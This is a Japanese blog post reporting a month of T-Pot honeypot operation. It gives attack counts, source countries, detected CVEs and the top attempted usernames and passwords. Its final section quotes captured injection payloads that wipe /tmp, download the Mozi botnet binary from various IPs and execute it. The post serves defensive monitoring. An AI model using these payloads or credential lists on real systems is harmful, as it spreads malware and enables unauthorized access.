Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2022年2月)

ロシアによるウクライナへの軍事侵攻が2/24(木)から開始された。

タイムズ紙によるとロシアによるウクライナ侵攻の直前に、中国がウクライナに大規模なサイバー攻撃を仕掛けていたとの報道もあり中国がロシアの侵攻を事前に織り込んでいたことが示唆されている。 www.thetimes.co.uk

戦争の激化に伴い、ウクライナ侵攻に関連するアクセスもより活発になることが予想される。一刻も早い戦争終結を祈るばかりである。
www3.nhk.or.jp

T-Potにて1か月運用した結果を記載する。

今月のChangelog

・今月は無し。 ※CHANGELOG.mdを参照していたがメンテされないため、Commitsログを参考にする。

github.com github.com

前提条件

運用日時:2022年2月1日-2022年2月28日
運用期間:28日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 1,414,228 -
2 Honeytrap 860,428 -
3 Heralding 726,797 -
4 Dionaea 315,661 -
5 Rdpy 123,447 -
6 Adbhoney 16,215 -
7 Mailoney 9,890 -
8 Tanner 5,374 -
9 Ciscoasa 1,986 -
10 ConPot 1,861 -
11 CitrixHoneypot 1,783 -
12 ElasticPot 834 -
13 Medpot 327 -
14 Dicompot 71 -
15 Honeysap 37 -
  • Result
    • 先月はデータ消去事故が発生したため、先月比の比較は無し。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Russia 774,646 -
2 Netherlands 429,214 -
3 United States 420,509 -
4 China 412,076 -
5 Japan 116,656 -
6 Vietnam 95,508 -
7 India 75,679 -
8 Singapore 63,631 -
9 Poland 61,354 -
10 Spain 53,663 -
11 Denmark 53,471 -
12 Brazil 49,195 -
13 Germany 48,984 -
14 South Korea 48,654 -
15 United Kingdom 43,466 -
16 Hong Kong 42,487 -
17 Mexico 34,838 -
18 Indonesia 33,494 -
19 Ukraine 27,543 -
20 Sweden 23,609 -
  • Result

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,479,040
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 480
3 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 14
4 CVE-2020-11910 3

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 105,222
2 sa 26,042
3 nproc 6,395
4 user 6,299
5 admin 5,469
6 test 2,014
7 postgres 1,830
8 ubuntu 1,542
9 22 1,182
10 oracle 926
11 ftpuser 753
12 git 708
13 (empty) 640
14 !root 599
15 2Wire 592
16 support 586
17 mysql 481
18 administrator 465
19 ftp 454
20 guest 453
21 www 443
22 web 423
23 testuser 408
24 deploy 381
25 info@mailrelay.local 375
26 user1 343
27 adm 339
28 jenkins 316
29 666666 306
30 debug 301
31 minecraft 301
32 unknown 300
33 0 293
34 $ALOC$ 287
35 anonymous 282
36 blank 276
37 www-data 275
38 sales@mailrelay.local 267
39 server 259
40 test1 259
41 hadoop 258
42 Admin 256
43 test@mailrelay.local 252
44 db 248
45 tomcat 247
46 dev 243
47 data 237
48 nagios 236
49 teamspeak 234
50 wwwroot 231
  • Result
    • メールアドレスをユーザ名に指定したアクセスが幾つか確認された。  info@mailrelay.local(25位)、sales@mailrelay.local(38位)、test@mailrelay.local(43位)

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 10,159
2 123456 8,045
3 nproc 6,395
4 1 3,023
5 123 2,895
6 password 2,615
7 (empty) 1,849
8 root 1,800
9 1234 1,691
10 user 1,662
11 12345 1,610
12 12345678 1,033
13 blank 885
14 test 859
15 123456789 594
16 0 562
17 1q2w3e4r 533
18 111111 525
19 123123 509
20 qwerty 509
21 666666 493
22 1qaz2wsx 469
23 abc123 391
24 support 387
25 P@ssw0rd 385
26 ubnt 376
27 00000000 371
28 1234567 371
29 123qwe 359
30 admin123 357
31 master 357
32 test123 335
33 Password 333
34 pass 328
35 p@ssw0rd 325
36 backup 324
37 alpine 319
38 1234567890 313
39 Passw0rd 309
40 unknown 309
41 synnet 289
42 hi3518 285
43 !ishtar 284
44 password123 252
45 passw0rd 246
46 q1w2e3r4 246
47 123321 229
48 1qaz@WSX 228
49 000000 217
50 passwd 203
  • Result
    • パスワード に関連した文字列が多かった

⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。

  • Zmapの観測結果は以下の通り。

  • Result

    • 特記事項は無し。

最後に

Peach is the best.



* shファイルとexeファイル関連の問い合わせは以下の通り。

◆shファイルに関するアクセス
ASCII text, with CRLF line terminators  /putkite/quickr1n.sh
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV)    /1.txt
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV)    /1a.txt
POSIX shell script, ASCII text executable   /bins.sh

◆exeファイルに関するアクセス
PE32 executable (GUI) Intel 80386, for MS Windows   exiles.exe
PE32 executable (GUI) Intel 80386, for MS Windows   s.exe
PE32 executable (GUI) Intel 80386, for MS Windows   smss.exe

◆jsファイルに関するアクセス
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/101.0.54.113:34156/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/103.217.123.245:35220/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.198.251.73:41927/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.201.207.222:59276/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.251.57.35:46227/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/118.232.97.242:54791/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/175.11.134.111:24485/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/185.181.43.55:39167/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js